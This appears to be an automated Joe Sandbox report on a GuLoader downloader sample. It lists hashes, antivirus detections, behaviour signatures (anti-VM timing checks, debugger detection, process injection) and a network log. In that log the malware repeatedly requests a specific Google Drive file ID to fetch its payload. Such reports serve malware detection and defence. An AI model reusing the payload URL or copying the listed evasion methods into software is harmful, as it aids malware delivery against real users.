Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SvmL9tW29w.exe

Overview

General Information

Sample name:SvmL9tW29w.exe
renamed because original name is a hash value
Original sample name:d34f580b7d5be3be089661d02663d0605cd776008a2301491f11299c13f6642f.exe
Analysis ID:1587619
MD5:f189174b0a4a4e9689b6c47693bb6d37
SHA1:152a93f75fceb347dd241956bc4836a0b31b9f11
SHA256:d34f580b7d5be3be089661d02663d0605cd776008a2301491f11299c13f6642f
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SvmL9tW29w.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\SvmL9tW29w.exe" MD5: F189174B0A4A4E9689B6C47693BB6D37)
    • SvmL9tW29w.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\SvmL9tW29w.exe" MD5: F189174B0A4A4E9689B6C47693BB6D37)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.3747394738.0000000004831000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000002.3745241820.0000000003591000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:57:07.035370+010028032702Potentially Bad Traffic192.168.2.749971142.250.184.238443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: SvmL9tW29w.exeAvira: detected
      Source: SvmL9tW29w.exeReversingLabs: Detection: 75%
      Source: SvmL9tW29w.exeVirustotal: Detection: 76%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: SvmL9tW29w.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49971 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49973 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49983 version: TLS 1.2
      Source: SvmL9tW29w.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_004027A1 LdrInitializeThunk,FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49971 -> 142.250.184.238:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficHTTP traffic detected: GET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4tlo1Weq1gU6ppUhbjcd25z2aUL8wYSSQBzwA2cUE8H4SpBFA-YE5XcnOTTtIbFcXpOi8GZvAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:57:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9JYnqFMEw-QJgztaTjrHRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs; expires=Sat, 12-Jul-2025 14:57:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRgJqpBNZ_EZpLi7dq4UXxhBD_zpdQItzXFJerBui39qGNImpoo4NqSUgIofSh_vRbbp4460QIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:57:10 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-e_0_PICDns5DQnp89QIEXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC624BWhnJA3pHghIzRf8UG8ftODgzYo46J459Cyvs8rRAclU_c0avQT5iPFBvQq8Q_nH4vDJS4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:57:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-4jC8RBl_ayfaOIJ4bJUxNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTwhA3OgRxVffrwSXcTDjCSYS37psufADnt9p3fq_NITfGfqLOuBl96GtU7SQLSNpsP1WaECA0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:57:15 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VPIQ1MRdU6BS2tOVTzba3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT7WsJs7wvm733yZCtJqCx7jvUhXdiwJvYbVvQ3hKZuBFunfQF8ooeAX6XKVS72qRtkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:57:17 GMTContent-Security-Policy: script-src 'nonce-6Fm_4QBLjGAbeTYJbyEllA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri 